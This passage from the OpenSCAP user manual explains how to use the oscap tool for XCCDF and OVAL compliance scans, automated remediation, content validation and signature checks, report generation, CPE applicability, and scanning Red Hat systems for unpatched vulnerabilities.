rule was not evaluated by the checking engine. This status is designed for rules that have no <xccdf:check> elements or that correspond to an unsupported checking system. It may also correspond to a status returned by a checking engine if the checking engine does not support the indicated check code.\n|The rule does not reference any OVAL check.\n\n|notselected\n|The rule was not selected in the benchmark. OpenSCAP does not display rules that were not selected.\n|The rule exists in the benchmark, but is not a part of selected profile.\n\n|informational\n|The rule was checked, but the output from the checking engine is simply information for auditors or administrators; it is not a compliance category. This status value is designed for rules whose main purpose is to extract information from the target rather than test the target.\n|\n\n|fixed\n|The rule had failed, but was then fixed by automated remediation.\n|\n|===\n\nThe CPE dictionary is used to determine whether the content is\napplicable on the target platform or not. 
Any content that is not
applicable will result in each relevant XCCDF rule being evaluated to
"notapplicable".

The following examples show the most common scenarios of XCCDF benchmark
evaluation:

* To evaluate a specific profile in an XCCDF file run this command:

----
$ oscap xccdf eval --profile Desktop --results xccdf-results.xml --cpe cpe-dictionary.xml scap-xccdf.xml
----

Where *scap-xccdf.xml* is the XCCDF document, *Desktop* is the selected
profile from the XCCDF document, *xccdf-results.xml* is a file storing
the scan results, and *cpe-dictionary.xml* is the CPE dictionary.

* You can additionally add the `--rule` option to the above command to evaluate
a specific rule:

----
$ oscap xccdf eval --profile Desktop --rule ensure_gpgcheck_globally_activated --results xccdf-results.xml --cpe cpe-dictionary.xml scap-xccdf.xml
----

Where *ensure_gpgcheck_globally_activated* is the only rule from the *Desktop*
profile which will be evaluated.

==== Source DataStream
Commonly, all required input files are bundled together in a Source DataStream.
Scanning using a Source DataStream is also handled by the `oscap xccdf eval` command,
with some additional parameters available to determine which of the bundled
benchmarks should be evaluated.

* To evaluate a specific XCCDF benchmark that is part of a DataStream
within a SCAP DataStream collection, run the following command:

----
$ oscap xccdf eval --datastream-id ds.xml --xccdf-id xccdf.xml --results xccdf-results.xml scap-ds.xml
----

Where *scap-ds.xml* is a file representing the SCAP DataStream
collection, *ds.xml* is the particular DataStream, *xccdf.xml* is ID of
the component-ref pointing to the desired XCCDF document, and
*xccdf-results.xml* is a file containing the scan results.

NOTE: If you omit `--datastream-id` on the command line, the first data
stream from the collection will be used. If you omit `--xccdf-id`, the
first component from the checklists element will be used. If you omit
both, the first DataStream that has a component in the checklists
element will be used - the first component in its checklists element
will be used.


* (Alternative, not recommended) To evaluate a specific XCCDF benchmark
that is part of a DataStream within a SCAP DataStream collection run
the following command:

--------------------------------------------------------------------------------------
$ oscap xccdf eval --benchmark-id benchmark_id --results xccdf-results.xml scap-ds.xml
--------------------------------------------------------------------------------------

Where *scap-ds.xml* is a file representing the SCAP DataStream
collection, *benchmark_id* is a string matching the "id" attribute of
the xccdf:Benchmark contained in a component, and *xccdf-results.xml* is a
file containing the scan results.
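In the simplest case, when the defaults described in the note above are
acceptable, the data stream can be evaluated directly (a minimal sketch; the
profile and file names are illustrative):

----
$ oscap xccdf eval --profile standard --results xccdf-results.xml scap-ds.xml
----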
==== Result DataStream (ARF)

In the examples above we are generating XCCDF result files using the `--results`
command-line argument. You can use `--results-arf` to generate a Result DataStream
(also called ARF - Asset Reporting Format) XML instead.

--------------------------------------------------------------------------------------
$ oscap xccdf eval --benchmark-id benchmark_id --results-arf arf-results.xml scap-ds.xml
--------------------------------------------------------------------------------------

==== Result STIG Viewer

If you want to import the XCCDF scan results to DISA STIG Viewer but your Rule IDs don't
match the DISA's ones, you can use the `--stig-viewer` command-line argument along with
a special reference in your Rules to generate XCCDF result files that can be imported by
DISA STIG Viewer.

--------------------------------------------------------------------------------------
$ oscap xccdf eval --profile stig-rhel7-disa --stig-viewer results-stig.xml ssg-rhel7-ds.xml
--------------------------------------------------------------------------------------

Each rule in the input XCCDF must contain a reference to its STIG Rule ID, and its
href attribute must be exactly `http://iase.disa.mil/stigs/Pages/stig-viewing-guidance.aspx`.

For example:
----
<Rule id="rpm_verify_permissions">
 ...
 <reference href="http://iase.disa.mil/stigs/Pages/stig-viewing-guidance.aspx">SV-86473r2_rule</reference>
 ...
</Rule>
----

For more information on DISA STIG Viewer click link:http://iase.disa.mil/stigs/Pages/stig-viewing-guidance.aspx[here].

=== Remediate System
OpenSCAP can automatically remediate systems that have been found in a
non-compliant state. For system remediation, an XCCDF file with instructions is
required. The _scap-security-guide_ package contains certain remediation
instructions.

System remediation consists of the following steps:

 . `oscap` performs a regular XCCDF evaluation.
 . An assessment of the results is performed by evaluating the OVAL definitions.
 Each rule that has failed is marked as a candidate for remediation.
 . `oscap` searches for an appropriate fix element, resolves it, prepares the
 environment, and executes the fix script.
 . Any output of the fix script is captured by `oscap` and stored within the
 *rule-result* element. The return value of the fix script is stored as well.
 . Whenever `oscap` executes a fix script, it immediately evaluates the OVAL
 definition again (to verify that the fix script has been applied correctly).
 During this second run, if the OVAL evaluation returns success, the result of
 the rule is *fixed*, otherwise it is an *error*.
 . Detailed results of the remediation are stored in an output XCCDF file. It
 contains two *TestResult* elements. The first *TestResult* element represents the
 scan prior to the remediation. The second *TestResult* is derived from the first
 one and contains remediation results.

There are three modes of operation of `oscap` with regard to remediation:
online, offline, and review.

==== Online Remediation
Online remediation executes fix elements at the time of scanning. Evaluation and
remediation are performed as a part of a single command.

To enable online remediation, use the `--remediate` command-line option.
For example, to execute online remediation using the _scap-security-guide_ package,
run:

----
$ oscap xccdf eval --remediate --profile xccdf_org.ssgproject.content_profile_rht-ccp --results scan-xccdf-results.xml /usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml
----

The output of this command consists of two sections. The first section shows the
result of the scan prior to the remediation, and the second section shows the
result of the scan after applying the remediation. The second part can contain
only *fixed* and *error* results. The *fixed* result indicates that the scan performed
after the remediation passed. The *error* result indicates that even after
applying the remediation, the evaluation still does not pass.

==== Offline Remediation
Offline remediation allows you to postpone fix execution. In the first step, the
system is only evaluated, and the results are stored in a *TestResult* element in
an XCCDF file.

In the second step, `oscap` executes the fix scripts and verifies the result. It
is safe to store the results in the input file; no data will be lost. During
offline remediation, a new *TestResult* element is created that is based
on the input one and inherits all the data. The newly created *TestResult*
differs only in the *rule-result* elements that have failed. For those,
remediation is executed.

To perform offline remediation using the _scap-security-guide_ package, run:

----
$ oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_rht-ccp --results scan-xccdf-results.xml /usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml
----
----
$ oscap xccdf remediate --results scan-xccdf-results.xml scan-xccdf-results.xml
----

==== Remediation Review
The review mode allows users to store remediation instructions to a file for
further review. The remediation content is not executed during this operation.
To generate remediation instructions in the form of a shell script, run:

----
$ oscap xccdf generate fix \
--fix-type bash \
--profile xccdf_org.ssgproject.content_profile_rht-ccp \
--output my-remediation-script.sh \
/usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml
----
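The generated script can then be reviewed and, if appropriate, executed
manually (a usage sketch; run the script only after you have inspected what
it does):

----
$ less my-remediation-script.sh
# bash my-remediation-script.sh
----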
=== Check Engines
Most XCCDF content uses the OVAL check engine. This is when OVAL
Definitions are being evaluated in order to assess a system. Complete
information about an evaluation is recorded in OVAL Results files, as
defined by the OVAL specification. By examining these files it's
possible to check which definitions were used for the evaluation and why the
results are as they are. Please note that these files are not generated
unless *--oval-results* is used.

Some content may use alternative check engines, for example the
{sce_web}[SCE] check engine.

Results of rules with a check that requires a check engine not supported
by OpenSCAP will be reported as *notchecked*. Check contents are not
read or interpreted in any way unless the check system is known and
supported. The following is an evaluation output of an XCCDF with an unknown
check system:

--------------------------------------------------------
$ oscap xccdf eval sds-datastream.xml

Title Check group file contents
Rule xccdf_org.example_rule_system_authcontent-group
Result notchecked

Title Check password file contents
Rule xccdf_org.example_rule_system_authcontent-passwd
Result notchecked

Title Check shadow file contents
Rule xccdf_org.example_rule_system_authcontent-shadow
Result notchecked

...
--------------------------------------------------------

NOTE: The *notchecked* result is also reported for rules that have no
check implemented. *notchecked* means that there was no check in that
particular rule that could be evaluated.


==== CVE, CCE, CPE and other identifiers
Each XCCDF Rule can have xccdf:ident elements inside. These elements
allow the content creator to reference various external identifiers like
CVE, CCE, CPE and others.

When scanning, oscap outputs the identifiers of scanned rules regardless of
their results. For example:

------------------------------------------------------------------------
Title Ensure Repodata Signature Checking is Not Disabled For Any Repos
Rule rule-2.1.2.3.6.a
Result pass

Title Verify user who owns 'shadow' file
Rule rule-2.2.3.1.a
Ident CCE-3918-0
Result pass

Title Verify group who owns 'shadow' file
Rule rule-2.2.3.1.b
Ident CCE-3988-3
Result pass
------------------------------------------------------------------------

All identifiers (if any) are printed to stdout for each rule. Since
standard output doesn't allow for compact identifier metadata to be
displayed, only the identifiers themselves are displayed there.

Identifiers are also part of the HTML report output. If the identifier
is a CVE, you can click it to display its metadata from the official NVD
database (requires internet connection).
OpenSCAP doesn't provide
metadata for other types of identifiers.

Another place where these identifiers can be found is the machine-readable
Result DataStream file, which can be generated during the scan by adding the
*--results-arf* option.

----
$ oscap xccdf eval \
--profile xccdf_org.ssgproject.content_profile_common \
--fetch-remote-resources --results-arf results.xml \
/usr/share/xml/scap/ssg/content/ssg-rhel6-ds.xml
----

The Result DataStream file **results.xml** contains these identifiers in <rule-result>
elements.

----
<rule-result
 idref="xccdf_org.ssgproject.content_rule_partition_for_tmp"
 time="2017-01-20T14:30:18" severity="low" weight="1.000000">
 <result>pass</result>
 <ident system="https://nvd.nist.gov/cce/index.cfm">CCE-27173-4</ident>
 <check system="http://oval.mitre.org/XMLSchema/oval-definitions-5">
 <check-content-ref name="oval:ssg-partition_for_tmp:def:1" href="#oval0"/>
 </check>
</rule-result>
----

Since OpenSCAP 1.2.9 you can use the Group-By feature of the HTML report
to get an overview of results based on their identifiers and references.

The HTML report can also be used to look up Rules by their identifiers.
You can type the identifier (e.g. CCE-27173-4) in the search box in
the HTML report and only rules with this identifier will be shown.
This can be used for any type of XCCDF identifier or reference.
You can also click on the rule title to show more details and see all
its identifiers, including the identifier you looked for.
This relies heavily on SCAP content quality; if the identifiers are
not present in the source content they will not be available in the
HTML report.

If you want to map two identifiers -- e.g. map a CCE identifier to a
NIST 800-53 identifier -- you need to look up the CCE ID in the
HTML report through the search box using the first identifier. Then,
by grouping by NIST SP 800-53 ID, you can see all NIST 800-53 IDs
related to the searched CCE ID.


==== Bundled CCE data
OpenSCAP does not provide any static or product bundled CCE data. Thus
it has no way of displaying the last generated, updated and officially
published dates of static or product bundled CCE data because the dates
are not defined.

==== Scanning with Script Check Engine (SCE)
The Script Check Engine (SCE) is an alternative check engine for XCCDF checklist
evaluation. SCE allows you to call shell scripts out of the XCCDF document.
This approach might be suitable for various use cases, mostly when OVAL checks
are not required. More information about SCE usage is available on this page:
{sce_web}[Using SCE].

WARNING: SCE is not part of any SCAP specification.


== Advanced oscap usage

=== Validating SCAP Content
Before you start using a security policy on your systems, you should first
verify the policy in order to avoid any possible syntax or semantic errors in
the policy. The `oscap` tool can be used to validate the security content
against standard SCAP XML schemas. The validation results are printed to the
standard error stream (stderr). The general syntax of such a validation command
is the following:

----
$ oscap module validate [module_options_and_arguments] file
----

where file is the full path to the file being validated. As a `module` you
can use:

 * xccdf,
 * oval,
 * cpe or
 * cve.

The only exception is the data stream module (ds), which uses the sds-validate
operation instead of validate.
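For instance, to validate a plain XCCDF file (the filename is illustrative):

----
$ oscap xccdf validate scap-xccdf.xml
----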
For the data stream module, the command looks like this:

----
$ oscap ds sds-validate scap-ds.xml
----

NOTE: Note that all SCAP components within the given data stream are validated
automatically and none of the components is specified separately.

You can also enable extra Schematron-based validation when you validate an OVAL
document. This validation method is slower but it provides deeper analysis.
Run the following command to validate an OVAL document using Schematron:

----
$ oscap oval validate --schematron oval-file.xml
----

The results of validation are printed to the standard error stream (stderr).

NOTE: Please note that for the rest of `oscap` functionality, unless you specify
--skip-valid, validation will automatically occur before files are used.
Therefore, you do not need to explicitly validate a datastream before
use.


=== SCAP Content Signing and Signature Verification
The `oscap` tool itself does not do signature verification; it skips over the
respective elements. This is due to the fact that there are way too many options
when it comes to keystores and crypto choices. Instead, we recommend using
{xmlsec}[xmlsec1] to verify your SCAP content. Safely evaluating signed
content (with signature verification) involves the following steps:

1) Install xmlsec1 and at least one of its crypto engines
-------------------------------------
# yum install xmlsec1 xmlsec1-openssl
-------------------------------------

2) Run `xmlsec1 --verify` on the content:

This simple example will only show 2 specific cases of verifying the
signature; the steps may vary depending on which technique was used to
sign the datastream.

Assuming the datastream was signed with a private key and we have the
respective public key to verify it with:

------------------------------------------------------
$ xmlsec1 --verify --pubkey-pem pub.key datastream.xml
------------------------------------------------------

Assuming the datastream was signed with a certificate and we have the
respective public part of the certificate to verify it with:

---------------------------------------------------------------
$ xmlsec1 --verify --pubkey-cert-pem pubcert.key datastream.xml
---------------------------------------------------------------

There are countless other options; for more details see: `xmlsec1
--help-verify`

Successful output should look similar to this:

------------------------------------------------------
$ xmlsec1 --verify --pubkey-pem key.pub datastream.xml
OK
SignedInfo References (ok/all): 1/1
Manifests References (ok/all): 0/0
------------------------------------------------------

And the exit code must be 0 before proceeding.

3) If the previous steps resulted in successful verification, proceed
by evaluating the datastream:

---------------------------------
$ oscap xccdf eval datastream.xml
---------------------------------

NOTE: If you want to experiment with various crypto engines of xmlsec1, see
 `xmlsec1-config --help`


=== Generating Reports and Guides
Another useful feature of `oscap` is the ability to generate SCAP content in a
human-readable format. It allows you to transform an XML file
into HTML or plain-text format. This feature is used to generate security
guides and checklists, which serve as a source of information, as well as
guidance for secure system configuration. The results of system scans can also
be transformed into readable result reports.
The general command syntax is
the following:

----
oscap module generate sub-module [specific_module/sub-module_options_and_arguments] file
----

where module is either `xccdf` or `oval`, `sub-module` is a type of
the generated document, and file represents an XCCDF or OVAL file. A sub-module
can be either `report`, `guide`, `custom` or `fix`. Please see
 `man oscap` for more details.


=== Content Transformation
The oscap tool is also capable of using the {xslt}[XSLT] (Extensible Stylesheet
Language Transformations) language, which allows transformation of a SCAP
content XML file into another XML, HTML, plain text or {xsl}[XSL] document.
This feature is very useful when you need the SCAP document in a
human-readable form. The following commands represent the most common
cases:

* Creating a guide (see an
https://static.open-scap.org/examples/guide.html[example]):
--------------------------------------------------------
$ oscap xccdf generate guide scap-xccdf.xml > guide.html
--------------------------------------------------------

* Creating a guide with profile checklist (see an
https://static.open-scap.org/examples/guide-checklist.html[example]):
------------------------------------------------------------------------------------
$ oscap xccdf generate guide --profile Desktop scap-xccdf.xml > guide-checklist.html
------------------------------------------------------------------------------------

* Generating the XCCDF scan report (see an
https://static.open-scap.org/examples/report-xccdf.html[example]):
-------------------------------------------------------------------
$ oscap xccdf generate report xccdf-results.xml > report-xccdf.html
-------------------------------------------------------------------

* Generating the OVAL scan report (see an
https://static.open-scap.org/examples/report-oval.html[example]):
----------------------------------------------------------------
$ oscap oval generate report oval-results.xml > report-oval.html
----------------------------------------------------------------

* Generating the XCCDF report with additional information from failed
OVAL tests (see an
https://static.open-scap.org/examples/report-xccdf-oval.html[example]):
----
$ oscap xccdf generate report \
--oval-template oval-results.xml xccdf-results.xml > report-xccdf-oval.html
----


=== CPE applicability
XCCDF rules in the content may target only specific platforms and hold
no meaning on other platforms. Such an XCCDF rule contains an
*<xccdf:platform>* element in its body. This element references a CPE
name or CPE2 platform (defined using **cpe2:platform-specification**)
that can be defined in a CPE dictionary file or a CPE language file,
or embedded directly in the XCCDF document.

An XCCDF rule can contain multiple *<xccdf:platform>* elements. It is
deemed applicable if at least one of the listed platforms is applicable.
If an XCCDF rule contains no *<xccdf:platform>* elements, it is considered
always applicable.

If the CPE name or CPE2 platform is defined in an external file, use the
 `--cpe` option; `oscap` auto-detects the format of the file.
The following
command is an example of evaluating XCCDF content using a CPE name
from an external file:

-----------------------------------------------------------------------------------------
$ oscap xccdf eval --results xccdf-results.xml --cpe external-cpe-file.xml xccdf-file.xml
-----------------------------------------------------------------------------------------

Where *xccdf-file.xml* is the XCCDF document, *xccdf-results.xml* is a file
containing the scan results, and *external-cpe-file.xml* is the CPE
dictionary or a language file.

If you are evaluating a source data stream, `oscap` automatically
registers all CPEs contained within the data stream. No extra steps have
to be taken. You can also register an additional external CPE file, as
shown by the command below:

----
$ oscap xccdf eval --datastream-id ds.xml --xccdf-id xccdf.xml --results xccdf-results.xml --cpe additional-external-cpe.xml scap-ds.xml
----

Where *scap-ds.xml* is a file representing the SCAP data stream
collection, *ds.xml* is the particular data stream, *xccdf.xml* is the
XCCDF document, *xccdf-results.xml* is a file containing the scan
results, and *additional-external-cpe.xml* is the additional CPE
dictionary or language file.

The `oscap` tool will use an OVAL file attached to the CPE dictionary to
determine applicability of any CPE name in the dictionary.

Apart from the instructions above, no extra steps have to be taken for
content using *cpe:fact-ref* or **cpe2:fact-ref**. See the following
sections for details on resolving.

==== xccdf:platform applicability resolution

When a CPE name or language model platform is referenced via
*<xccdf:platform>* elements, resolution happens in the following order:

 . Look into the embedded CPE2 language model; if the name is found and
 applicable, deem it applicable
 . If not found or not applicable, look into external CPE2 language models
 (order of registration)
 . If not found or not applicable, look into the embedded CPE dictionary
 . If not found or not applicable, look into external CPE dictionaries (order of
 registration)

If the CPE name is not found in any of the sources, it is deemed not
applicable. If it is found in any of the sources but not applicable, we
look for it elsewhere.

==== cpe:fact-ref and cpe2:fact-ref resolution

A CPE name referenced from within fact-ref is resolved in the following
order:

. Look into the embedded CPE dictionary; if the name is found and applicable,
deem it applicable
. If not found or not applicable, look into external CPE dictionaries
(order of registration)

==== Built-in CPE Naming Dictionary

Apart from the external CPE Dictionaries, `oscap` comes with a built-in
CPE Dictionary. The built-in CPE Dictionary contains only a few products
(a sub-set of the http://nvd.nist.gov/cpe.cfm[Official CPE Dictionary]) and it
is used as a fall-back option when there is no other CPE source found.

The list of built-in CPE names can be found in the output of

-----------------
$ oscap --version
-----------------

You can file a request to include any additional product in the built-in
dictionary via the https://www.redhat.com/mailman/listinfo/open-scap-list[open-scap
mailing list] or
https://bugzilla.redhat.com/enter_bug.cgi?product=Fedora[bugzilla].


=== Notes on the Concept of Multiple OVAL Values
This section describes advanced concepts of OVAL Variables and their
implementation in `oscap`.
The SCAP specification allows for an OVAL
variable to have multiple values during a single assessment run. There
are two variable modes which can be combined:

* Multival -- A variable is assigned multiple values at the same
time. As an example, consider a variable which refers to the preferred
permissions of a given file, which may take multiple values like '600' and
'400'. The evaluation tries to match each (or all) and then outputs a
single OVAL Definition result.
* Multiset -- A variable is assigned a different value (or
multival) for different evaluations. This is known as a
*variable_instance*. As an example, consider an OVAL definition which
checks that a package given by a variable is not installed. For the first
evaluation of the definition, the variable can be assigned the
'telnet-server' value; the second time, the variable can be assigned the
'tftp-server' value. Therefore both evaluations may output different
results. Thus, the OVAL Results file may contain multiple results for
the same definition; these are distinguished by the *variable_instance*
attribute.

These two concepts are a source of confusion for both the content
authors and the result consumers. On one hand, the first concept is well
supported by the standard and the OVAL Variable file format. It allows
multiple *<value>* elements for each *<variable>* element. On the other
hand, the second concept is not supported by the OVAL Variable schema,
which prevents fully automated evaluation of the multisets (unless you
use XCCDF to bridge that gap).

TIP: `oscap` supports both variable modes as described below.

==== Sources of Variable Values
First we need to understand how a single value can be bound to a
variable in the OVAL checking engine. There are three ways to do this:

1) OVAL Variables File -- The values of external variables can be
defined in an external file. Such a file is called an OVAL Variables file
and can be recognized by using the following command: `oscap info
file.xml`. The OVAL Variables file can be passed to the evaluation by
the `--variables` argument such as:
----
$ oscap oval eval \
--variables usgcb-rhel5desktop-oval.xml-0.variables-0.xml \
--results usgcb-results-oval.xml \
usgcb-rhel5desktop-oval.xml
----

2) XCCDF Bindings -- The values of external variables can be given from
an XCCDF file. In the XCCDF file within each *<xccdf:check>* element,
there might be *<xccdf:check-export>* elements. These elements allow
transition of *<xccdf:value>* elements to *<oval:variables>* elements. The
following command allows users to export variable bindings from XCCDF to
an OVAL Variables file:
----
$ oscap xccdf export-oval-variables --profile united_states_government_configuration_baseline usgcb-rhel5desktop-xccdf.xml
----

3) Values within an OVAL Definition File -- Variable values can be defined
directly in the OVAL definitions file using *<constant_variable>* and
*<local_variable>* elements.

==== Evaluation of Multiple OVAL Values
With `oscap`, there are two ways in which two or more values can be
specified for a variable used by one OVAL definition. The approach you choose
depends on what mode you want to use, multival or multiset.

`oscap` handles multiple OVAL values seamlessly.
Users don't need to do
anything differently than for a normal scan.
The command below demonstrates evaluation of a DataStream, which may include
the multiset concept, the multival concept, both combined, or neither of them.
----
$ oscap xccdf eval --profile my_baseline --results-arf scap-arf.xml --cpe additional-external-cpe.xml scap-ds.xml
----

==== Multival
Multival can pass multiple values to a single OVAL definition
evaluation. This can be accomplished in all three ways described in
the previous section.

1) OVAL Variables file -- This option is straightforward. The file
format (XSD schema) allows for multiple *<value>* elements within each
*<variable>* element.

--------------------------------------------------------------------------------
<variable id="oval:com.example.www:var:1" datatype="string" comment="Unknown">
 <value>600</value>
 <value>400</value>
</variable>
--------------------------------------------------------------------------------

2) XCCDF Bindings -- Use multiple *<xccdf:check-export>* elements referring to the
very same OVAL variable binding with multiple different XCCDF values.
----
<check system="http://oval.mitre.org/XMLSchema/oval-definitions-5">
 <check-export value-id="xccdf_com.example.www_value_1"
 export-name="oval:com.example.www:var:1"/>
 <check-export value-id="xccdf_com.example.www_value_2"
 export-name="oval:com.example.www:var:1"/>
 <check-content-ref href="my-test-oval.xml" name="oval:com.example.www:def:1"/>
</check>
----

3) Values within OVAL Definitions file -- This is similar to using a
Variables file; multiple *<value>* elements are allowed within
*<constant_variable>* or *<local_variable>* elements.

==== Multiset
Multiset allows for the very same OVAL definition to be evaluated
multiple times using different values assigned to the variables for each
evaluation. In OpenSCAP, this is only possible by option (2) XCCDF
Bindings. The following XCCDF snippet evaluates the very same OVAL
Definition twice, each time binding a different value to the OVAL variable.

-------------------------------------------------------------------------------------------------------
<Rule id="xccdf_moc.elpmaxe.www_rule_1" selected="true">
 <check system="http://oval.mitre.org/XMLSchema/oval-definitions-5">
 <check-export value-id="xccdf_moc.elpmaxe.www_value_1" export-name="oval:com.example.www:var:1"/>
 <check-content-ref href="my-test-oval.xml" name="oval:com.example.www:def:1"/>
 </check>
</Rule>
<Rule id="xccdf_moc.elpmaxe.www_rule_2" selected="true">
 <check system="http://oval.mitre.org/XMLSchema/oval-definitions-5">
 <check-export value-id="xccdf_moc.elpmaxe.www_value_2" export-name="oval:com.example.www:var:1"/>
 <check-content-ref href="my-test-oval.xml" name="oval:com.example.www:def:1"/>
 </check>
</Rule>
-------------------------------------------------------------------------------------------------------

After the evaluation, the OVAL results file will contain multiple
result-definitions, multiple result-tests and multiple
collected-objects. Elements with the same id will be differentiated by
the value of the *variable_instance* attribute.
Each of the
definitions/tests/objects might have a different result of evaluation.
The following snippet of an OVAL results file illustrates the output of a
multiset evaluation.

----
<tests>
 <test test_id="oval:com.example.www:tst:1" version="1"
 check="at least one" result="true" variable_instance="1">
 <tested_item item_id="1117551" result="true"/>
 <tested_variable variable_id="oval:com.example.www:var:1">600</tested_variable>
 </test>
 <test test_id="oval:com.example.www:tst:1" version="1"
 check="at least one" result="false" variable_instance="2">
 <tested_item item_id="1117551" result="false"/>
 <tested_variable variable_id="oval:com.example.www:var:1">400</tested_variable>
 </test>
</tests>
----



=== External or remote resources
Some SCAP content references external resources. For example, SCAP Security Guide
uses an external OVAL file to check that the system is up to date and has no known
security vulnerabilities. However, other content can use external resources for
other purposes.

When you are evaluating SCAP content with external resources, the `oscap` tool
will warn you:

----
$ oscap xccdf eval \
--profile xccdf_org.ssgproject.content_profile_common \
/usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml

WARNING: This content points out to the remote resources. Use `--fetch-remote-resources' option to download them.
WARNING: Skipping https://www.redhat.com/security/data/oval/com.redhat.rhsa-RHEL7.xml.bz2 file which is referenced from XCCDF content
----

By default, the `oscap` tool will not blindly download and execute remote content.
If you trust your local content and the remote content it references, you can use
the `--fetch-remote-resources` option to automatically download it using the
`oscap` tool.

----
$ oscap xccdf eval \
--fetch-remote-resources \
--profile xccdf_org.ssgproject.content_profile_common \
/usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml
Downloading: https://www.redhat.com/security/data/oval/com.redhat.rhsa-RHEL7.xml.bz2 ... ok
Title Ensure /var/log Located On Separate Partition
Rule xccdf_org.ssgproject.content_rule_partition_for_var_log
...
----


=== Evaluating XCCDF rules with multiple checks

Normally, each XCCDF rule references a single check with a specified name.
However, if the `@name` attribute of `xccdf:check-content-ref` of a given rule is omitted,
multiple checks can be executed to evaluate the rule.
This is common for the `security_patches_up_to_date` check.
By default, only a single result is produced for an XCCDF rule in such a case, and the
result is computed from all results of checks in the referenced location.
If the user wants to see separate results for each check (one `xccdf:check-result` element
in the results document for each check evaluated), the `multi-check` attribute
of the `xccdf:check` element must be set to *true*.

----
<Rule
 id="xccdf_org.nist-testsuite.content_rule_security_patches_up_to_date"
 selected="false" weight="10.0">
 <title xml:lang="en-US">Security Patches Up-To-Date</title>
 <description xml:lang="en-US">All known security patches have been installed.</description>
 <requires idref="xccdf_org.nist-testsuite.content_group_CM-6"/>
 <requires idref="xccdf_org.nist-testsuite.content_group_SI-2"/>
 <check system="http://oval.mitre.org/XMLSchema/oval-definitions-5" multi-check="true">
 <check-content-ref href="r1100-scap11-win_rhel-patches.xml"/>
 </check>
</Rule>
----

In XCCDF specifications older than 1.2, the `multi-check` attribute is not defined,
which means that only a single result is always produced.
To produce separate results for each check from content older than XCCDF version 1.2,
you need to convert it first into XCCDF 1.2 using the following command:

----
$ xsltproc --stringparam reverse_DNS com.example.www /usr/share/openscap/xsl/xccdf_1.1_to_1.2.xsl xccdf.xml > xccdf-1.2.xml
----

Then patch the content using a text editor, adding `multi-check` as
shown in the example Rule snippet above.

To create a source DataStream from the patched content, the following command can be used:

----
$ oscap ds sds-compose xccdf-1.2.xml source_ds.xml
----

If the original XCCDF file referenced a custom CPE dictionary, you also have to inject
the CPE dictionary into the DataStream in order to create a valid source DataStream.
To add a CPE dictionary component into your DataStream in place, use this command:

----
$ oscap ds sds-add cpe_dictionary.xml source_ds.xml
----

Now the `source_ds.xml` DataStream can be evaluated as usual.

== Practical Examples
This section demonstrates practical usage of certain security content provided
for Red Hat products.

These practical examples show usage of industry standard checklists that
were validated by NIST.

=== Auditing System Settings with SCAP Security Guide
The SSG project contains guidance for settings of Red Hat Enterprise Linux 7.

1) Install the SSG

----
$ sudo yum install -y scap-security-guide
----

2) To inspect the security content use the `oscap info` module:

----
$ oscap info /usr/share/xml/scap/ssg/rhel7/ssg-rhel7-ds.xml
----

The output of this command contains available configuration profiles. To audit
your system settings, choose the
`xccdf_org.ssgproject.content_profile_rht-ccp` profile and run the
evaluation command.
For example, the following command is used to assess
the given system against a draft SCAP profile for Red Hat Certified Cloud
Providers:

----
$ oscap xccdf eval \
--profile xccdf_org.ssgproject.content_profile_rht-ccp \
--results ssg-rhel7-xccdf-result.xml \
--report ssg-rhel7-report.html \
/usr/share/xml/scap/ssg/rhel7/ssg-rhel7-ds.xml
----


=== Auditing Security Vulnerabilities of Red Hat Products
The Red Hat Security Response Team provides OVAL definitions for all
vulnerabilities (identified by CVE name) that affect Red Hat Enterprise
Linux 3, 4, 5, 6 and 7. This enables users to perform a vulnerability scan
and diagnose whether the system is vulnerable or not. The data is provided in
three ways -- an OVAL file, OVAL + XCCDF and a Source DataStream.

==== OVAL + XCCDF

1) Download the content
---------------------------------------------------------------------------------
$ wget https://www.redhat.com/security/data/metrics/com.redhat.rhsa-all.xccdf.xml
$ wget https://www.redhat.com/security/data/oval/com.redhat.rhsa-all.xml
---------------------------------------------------------------------------------

2) Run the scan
--------------------------------------------------------------------------------------------
$ oscap xccdf eval --results results.xml --report report.html com.redhat.rhsa-all.xccdf.xml
--------------------------------------------------------------------------------------------

This is a sample output. It reports that a Red Hat Security
Advisory (RHSA-2013:0911) was issued but the update was not applied, so the
system is affected by multiple CVEs (CVE-2013-1935, CVE-2013-1943,
CVE-2013-2017).

------------------------------------------------------------------------------------
Title RHSA-2013:0911: kernel security, bug fix, and enhancement update (Important)
Rule oval-com.redhat.rhsa-def-20130911
Ident CVE-2013-1935
Ident CVE-2013-1943
Ident CVE-2013-2017
Result fail
------------------------------------------------------------------------------------

A human-readable report *report.html* is generated, as well as a machine-readable
report **results.xml**. Both files hold information about the vulnerability
status of the scanned system. They map RHSAs to CVEs and report
which security advisories are not applied to the scanned system. CVE identifiers
are linked to the National Vulnerability Database, where additional information
like the CVE description, CVSS score, CVSS vector, etc. is stored.

==== OVAL only

1) Download the content
---------------------------------------------------------------------------------
$ wget https://www.redhat.com/security/data/oval/com.redhat.rhsa-all.xml
---------------------------------------------------------------------------------

2) Run the scan
--------------------------------------------------------------------------------------------
$ oscap oval eval --results results.xml --report report.html com.redhat.rhsa-all.xml
--------------------------------------------------------------------------------------------

This is a sample output.
It reports that a Red Hat Security
Advisory (RHSA-2013:0911) was issued but the update was not applied.
Notice that the standard output is different from the XCCDF + OVAL output.

------------------------------------------------------------------------------------
Definition oval:com.redhat.rhsa:def:20130911: true
------------------------------------------------------------------------------------

As in the case of XCCDF+OVAL, a human-readable report *report.html* and a
machine-readable report **results.xml** are generated. The look of *report.html*
differs from the one generated when an XCCDF checklist is used as the basis for
the scan, but it again holds information about the vulnerability status of the
scanned system and the mapping of RHSAs to CVEs. CVE identifiers are linked to
the Red Hat database, where additional information like the CVE description,
CVSS score, CVSS vector etc. is stored.


==== Source DataStream
The Source DataStream use-case is very similar to OVAL+XCCDF. The only
difference is that you don't have to download two separate files.

1) Download the content

---------------------------------------------------------------------------------
$ wget https://www.redhat.com/security/data/metrics/ds/com.redhat.rhsa-all.ds.xml
---------------------------------------------------------------------------------

2) Run the scan

--------------------------------------------------------------------------------------------
$ oscap xccdf eval --results results.xml --report report.html com.redhat.rhsa-all.ds.xml
--------------------------------------------------------------------------------------------


==== More Specialized Files

